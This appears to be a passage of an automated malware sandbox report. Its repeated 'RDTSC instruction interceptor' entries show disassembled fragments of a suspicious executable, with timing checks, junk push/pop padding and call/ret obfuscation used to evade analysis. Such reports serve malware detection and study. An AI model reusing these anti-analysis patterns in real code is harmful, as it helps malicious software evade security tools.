Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31790A second address: 317914 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8EA4E2EA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 317914 second address: 317924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F8EA52B3CA8h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 317AA5 second address: 317AAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 317AAB second address: 317AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 317AAF second address: 317AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 317F62 second address: 317F85 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8EA52B3CA6h 0x00000008 jmp 00007F8EA52B3CB5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3180F7 second address: 3180FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AC04 second address: 31AC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AC0A second address: 31AC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AC0F second address: 31ACD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jmp 00007F8EA52B3CB1h 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F8EA52B3CA8h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D2E23h], edi 0x00000032 mov dword ptr [ebp+122D2C31h], eax 0x00000038 push 00000000h 0x0000003a mov esi, dword ptr [ebp+122D3D31h] 0x00000040 push 0A4D8D11h 0x00000045 push ecx 0x00000046 jmp 00007F8EA52B3CB2h 0x0000004b pop ecx 0x0000004c xor dword ptr [esp], 0A4D8D91h 0x00000053 call 00007F8EA52B3CACh 0x00000058 mov esi, dword ptr [ebp+122D1CDDh] 0x0000005e pop edx 0x0000005f mov ecx, dword ptr [ebp+122D59F5h] 0x00000065 push 00000003h 0x00000067 mov esi, edx 0x00000069 push 00000000h 0x0000006b sub dword ptr [ebp+122D1BA8h], edx 0x00000071 push 00000003h 0x00000073 jp 00007F8EA52B3CA7h 0x00000079 push D4B9DDB5h 0x0000007e push eax 0x0000007f push edx 0x00000080 jl 00007F8EA52B3CACh 0x00000086 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31ACD3 second address: 31AD20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA4E2EA4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 14B9DDB5h 0x00000010 mov si, 24B4h 0x00000014 lea ebx, dword ptr [ebp+1244FAB1h] 0x0000001a push 00000000h 0x0000001c push eax 0x0000001d call 00007F8EA4E2EA48h 0x00000022 pop eax 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 add dword ptr [esp+04h], 00000016h 0x0000002f inc eax 0x00000030 push eax 0x00000031 ret 0x00000032 pop eax 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D2C3Ch], edx 0x0000003a xchg eax, ebx 0x0000003b push esi 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AD20 second address: 31AD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA52B3CAAh 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8EA52B3CB0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AD45 second address: 31AD49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AD49 second address: 31AD4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31ADAF second address: 31ADC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31ADC0 second address: 31ADC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31ADC4 second address: 31AE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8EA4E2EA56h 0x0000000b popad 0x0000000c nop 0x0000000d or dword ptr [ebp+122D1B30h], eax 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F8EA4E2EA48h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f add dword ptr [ebp+122D2F68h], edx 0x00000035 call 00007F8EA4E2EA49h 0x0000003a jp 00007F8EA4E2EA4Eh 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AE1F second address: 31AE55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 jl 00007F8EA52B3CBCh 0x0000000d push edi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edi 0x00000011 popad 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jne 00007F8EA52B3CA6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AE55 second address: 31AE5F instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AE5F second address: 31AE65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AE65 second address: 31AE69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AE69 second address: 31AE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AE81 second address: 31AE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8EA4E2EA4Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 31AF8F second address: 31AFCA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, dword ptr [ebp+122D3D69h] 0x00000013 push 00000000h 0x00000015 jmp 00007F8EA52B3CABh 0x0000001a push 84B234CEh 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 32C41F second address: 32C425 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 32C425 second address: 32C450 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8EA52B3CB8h 0x00000008 jmp 00007F8EA52B3CB2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jnp 00007F8EA52B3CACh 0x00000018 jnp 00007F8EA52B3CA6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33B2E5 second address: 33B314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA4E2EA53h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jmp 00007F8EA4E2EA52h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33B314 second address: 33B326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F8EA52B3CA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33B326 second address: 33B32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33B32A second address: 33B330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 339362 second address: 339368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 339368 second address: 339374 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F8EA52B3CA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 339374 second address: 339398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jbe 00007F8EA4E2EA46h 0x0000000b jmp 00007F8EA4E2EA51h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3399CB second address: 3399CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 339B38 second address: 339B3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 339F0F second address: 339F1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F8EA52B3CACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33A1AA second address: 33A1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33A1B7 second address: 33A1CC instructions: 0x00000000 rdtsc 0x00000002 je 00007F8EA52B3CA6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007F8EA52B3CA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33A313 second address: 33A317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33A317 second address: 33A31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33239E second address: 3323A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 3323A5 second address: 3323B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8EA52B3CABh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 30A025 second address: 30A035 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8EA4E2EA46h 0x00000008 jc 00007F8EA4E2EA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33AA1F second address: 33AA29 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F8EA52B3CACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33AB6B second address: 33AB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33AB71 second address: 33AB75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33AB75 second address: 33AB7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33AB7B second address: 33AB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F8EA52B3CB7h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33AD07 second address: 33AD0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33F765 second address: 33F769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33F769 second address: 33F79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8EA4E2EA4Ah 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jne 00007F8EA4E2EA5Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33FD50 second address: 33FD54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33FD54 second address: 33FD62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F8EA4E2EA4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 33FF03 second address: 33FF1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jng 00007F8EA52B3CA6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f ja 00007F8EA52B3CB0h 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 346AAC second address: 346AC2 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8EA4E2EA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F8EA4E2EA46h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 347019 second address: 34701D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34701D second address: 347073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007F8EA4E2EA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F8EA4E2EA51h 0x00000014 jns 00007F8EA4E2EA46h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jns 00007F8EA4E2EA52h 0x00000023 jmp 00007F8EA4E2EA51h 0x00000028 jo 00007F8EA4E2EA4Eh 0x0000002e pushad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 349920 second address: 349925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 349F61 second address: 349F67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 349F67 second address: 349F6C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A542 second address: 34A549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A549 second address: 34A54F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A7B8 second address: 34A7C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8EA4E2EA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A7C2 second address: 34A7EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F8EA52B3CABh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A7EC second address: 34A7F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A7F2 second address: 34A7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A7F6 second address: 34A7FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34A92A second address: 34A949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8EA52B3CB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jg 00007F8EA52B3CA6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34AF4D second address: 34AF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34AF53 second address: 34B006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F8EA52B3CBEh 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F8EA52B3CA8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000014h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 jp 00007F8EA52B3CB7h 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F8EA52B3CA8h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 jnl 00007F8EA52B3CACh 0x0000004f push 00000000h 0x00000051 pushad 0x00000052 mov edx, dword ptr [ebp+122D3C35h] 0x00000058 add al, 0000002Bh 0x0000005b popad 0x0000005c push ebx 0x0000005d jmp 00007F8EA52B3CB5h 0x00000062 pop edi 0x00000063 xchg eax, ebx 0x00000064 pushad 0x00000065 jbe 00007F8EA52B3CACh 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34B006 second address: 34B01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 push eax 0x0000000a jc 00007F8EA4E2EA54h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34B01A second address: 34B01E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34B98B second address: 34B995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34CABF second address: 34CAC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34CAC5 second address: 34CAD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8EA4E2EA46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34D277 second address: 34D27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34F4C4 second address: 34F4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Ryay9q4aDy.exe	RDTSC instruction interceptor: First address: 34F4CD second address: 34F560 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F8EA52B3CA8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D1A08h] 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push esi 0x0000002d call 00007F8EA52B3CA8h 0x00000032 pop esi 0x00000033 mov dword ptr [esp+04h], esi 0x00000037 add dword ptr [esp+04h], 00000016h 0x0000003f inc esi 0x00000040 push esi 0x00000041 ret 0x00000042 pop esi 0x00000043 ret 0x00000044 call 00007F8EA52B3CB5h 0x00000049 pop esi 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d jmp 00007F8EA52B3CB8h 0x00000052 pop esi 0x00000053 xchg eax, ebx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F8EA52B3CABh 0x0000005b rdtsc
